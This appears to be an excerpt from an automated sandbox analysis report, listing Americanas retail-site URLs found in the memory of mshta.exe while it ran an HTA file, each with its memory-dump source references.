https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-grid
Source: mshta.exe, 00000001.00000003.12487303820.0000000009B93000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487450474.0000000009B96000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556466118.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487196877.0000000009B90000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487689897.0000000009B9A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487377551.0000000009B94000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487884189.0000000009B9F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12543252032.0000000009BA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487723038.0000000009B9B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487415470.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577444815.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12535084740.0000000009BA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-miss
Source: mshta.exe, 00000001.00000003.12487303820.0000000009B93000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492513851.000000000BEE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487450474.0000000009B96000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556466118.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487196877.0000000009B90000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487689897.0000000009B9A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487377551.0000000009B94000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487884189.0000000009B9F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12543252032.0000000009BA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12488218298.0000000009BAD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487723038.0000000009B9B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12488128750.0000000009BAB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12488160348.0000000009BAC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487415470.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577444815.000000000A9E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-zion
Source: mshta.exe, 00000001.00000003.12487303820.0000000009B93000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555406957.000000000BFFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492513851.000000000BEE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487450474.0000000009B96000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556466118.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487196877.0000000009B90000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508725928.000000000BE41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12488908794.0000000009B48000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487689897.0000000009B9A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12488646093.0000000009B40000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487377551.0000000009B94000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-b2wad
Source: mshta.exe, 00000001.00000003.12555406957.000000000BFFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12489344982.0000000009B23000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12489202013.0000000009B1E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579844318.000000000C005000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557060559.000000000BFFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12520851219.0000000009B29000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12489241096.0000000009B1F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12489406959.0000000009B25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-theme
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555406957.000000000BFFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492513851.000000000BEE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487450474.0000000009B96000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556466118.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541572740.000000000A9F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487196877.0000000009B90000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509384643.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487689897.0000000009B9A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579844318.000000000C005000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487377551.0000000009B94000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12487884189.0000000009B9F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12543252032.0000000009BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-zion-
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556466118.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577444815.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559750595.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574494320.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508038235.000000000A9E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.
Source: mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542078121.0000000009722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510409430.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://venda.americanasmarketplace.com.br/cadastre
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551427723.000000000C051000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556317603.000000000C052000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C051000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579886236.000000000C052000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555082549.000000000C051000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542146842.000000000BE13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573530715.0000000009530000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://venda.americanasmarketplace.com.br/cadastre-sua-loja/?epar=bo_ax_cte_am_app_banner&utm_sourc
Source: mshta.exe, 00000001.00000003.12556397852.00000000071EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573257257.00000000071EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.00000000071D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509642076.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578601158.000000000BDE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512492941.000000000BDE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510268517.000000000BDC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508375868.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566725542.00000000095F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12499023095.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570171888.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551145227.000000000AB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515790688.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12499023095.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570171888.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515790688.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557816485.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508517476.000000000BE57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502799829.000000000BE56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559023058.0000000002EA7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509384643.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480609397.000000000BE56000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/?utm_source=web_app_manifest
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.00000000071F9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.00000000071D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573298342.00000000071FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510880698.00000000071FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.00000000071F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/ar-condicionado-portatil
Source: mshta.exe, 00000001.00000003.12556397852.00000000071EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573257257.00000000071EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.00000000071D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/ar-condicionado-portatilure
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579280057.000000000BE8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575317065.0000000009728000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542078121.0000000009722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/ar-condicionado-split-9000-btus
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574962923.000000000967A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/cesta-de-natal
